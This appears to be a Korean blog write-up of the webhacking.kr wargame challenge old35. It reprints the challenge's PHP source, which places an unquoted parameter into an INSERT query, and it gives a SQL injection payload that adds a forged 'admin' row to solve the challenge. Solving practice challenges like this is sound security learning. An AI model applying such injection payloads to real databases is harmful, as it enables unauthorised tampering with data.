webhacking.kr - old35

2021. 4. 6. 13:16WarGame/webhaking.kr

처음에 접속하면 위와 같이 입력창이 나옵니다.

sqli문제이기에 소스코드를 확인해보면

<?php
  include "../../config.php";
  if($_GET['view_source']) view_source();
?><html>
<head>
<title>Challenge 35</title>
<head>
<body>
<form method=get action=index.php>
phone : <input name=phone size=11 style=width:200px>
<input name=id type=hidden value=guest>
<input type=submit value='add'>
</form>
<?php
$db = dbconnect();
if($_GET['phone'] && $_GET['id']){
  if(preg_match("/\*|\/|=|select|-|#|;/i",$_GET['phone'])) exit("no hack");
  if(strlen($_GET['id']) > 5) exit("no hack");
  if(preg_match("/admin/i",$_GET['id'])) exit("you are not admin");
  mysqli_query($db,"insert into chall35(id,ip,phone) values('{$_GET['id']}','{$_SERVER['REMOTE_ADDR']}',{$_GET['phone']})") or die("query error");
  echo "Done<br>";
}

$isAdmin = mysqli_fetch_array(mysqli_query($db,"select ip from chall35 where id='admin' and ip='{$_SERVER['REMOTE_ADDR']}'"));
if($isAdmin['ip'] == $_SERVER['REMOTE_ADDR']){
  solve(35);
  mysqli_query($db,"delete from chall35");
}

$phone_list = mysqli_query($db,"select * from chall35 where ip='{$_SERVER['REMOTE_ADDR']}'");
echo "<!--\n";
while($r = mysqli_fetch_array($phone_list)){
  echo htmlentities($r['id'])." - ".$r['phone']."\n";
}
echo "-->\n";
?>
<br><a href=?view_source=1>view-source</a>
</body>
</html>

 

위에 쿼리에서 

 

> mysqli_query($db,"insert into chall35(id,ip,phone) values('{$_GET['id']}','{$_SERVER['REMOTE_ADDR']}',{$_GET['phone']})") or die("query error");

 

위 부분에서 admin을 id에 넣어주고, ip주소를 맞춰주면 되니까, 쿼리를 우회해서

 

> 12), ('admin','현재 내 아이피 주소','1234'

 

로 넣으면 문제를 풀 수 있습니다.

 

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